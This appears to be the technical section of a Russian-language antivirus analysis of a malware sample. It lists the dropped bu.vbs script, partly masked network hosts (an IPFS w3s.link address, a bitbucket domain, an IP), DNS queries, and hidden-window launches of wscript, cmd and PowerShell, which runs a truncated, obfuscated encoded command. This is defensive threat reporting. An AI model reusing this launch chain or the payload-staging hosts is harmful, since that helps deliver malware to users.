Техническая информация
- %TEMP%\ixp000.tmp\bu.vbs
- %TEMP%\ixp000.tmp\bu.vbs
- 'ba##################wnvxzs23m3kjr6bfvgszbfwybmmcosl4rrhvuo4.ipfs.w3s.link':443
- 'pk#.goog':80
- 'bi###cket.org':443
- http://pk#.goog/gsr1/gsr1.crt
- '34.##9.100.209':443
- '<DNS_SERVER>':53
- 'ba##################wnvxzs23m3kjr6bfvgszbfwybmmcosl4rrhvuo4.ipfs.w3s.link':443
- 'bi###cket.org':443
- DNS ASK ba##################wnvxzs23m3kjr6bfvgszbfwybmmcosl4rrhvuo4.ipfs.w3s.link
- DNS ASK pk#.goog
- DNS ASK bi###cket.org
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\bu.vbs"
- '<SYSTEM32>\cmd.exe' /c bu.vbs (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='Wwd@OAGUAdAAuAFMAZQd@yAHYAaQd@jAGUAUAd@vAGkAbgd@0AE0AYQd@uAGEAZwd@lAHIAXQA6ADoAUwd@lAGMAdQd@yAGkAdAd@5AFAAcgd@vAHQAbwd@jAG8AbAAgAD0AIAd@bAE4AZQd@0AC4AUwd@lAGMAdQd@yAGkAdAd@5AFAAcgd@v... (со скрытым окном)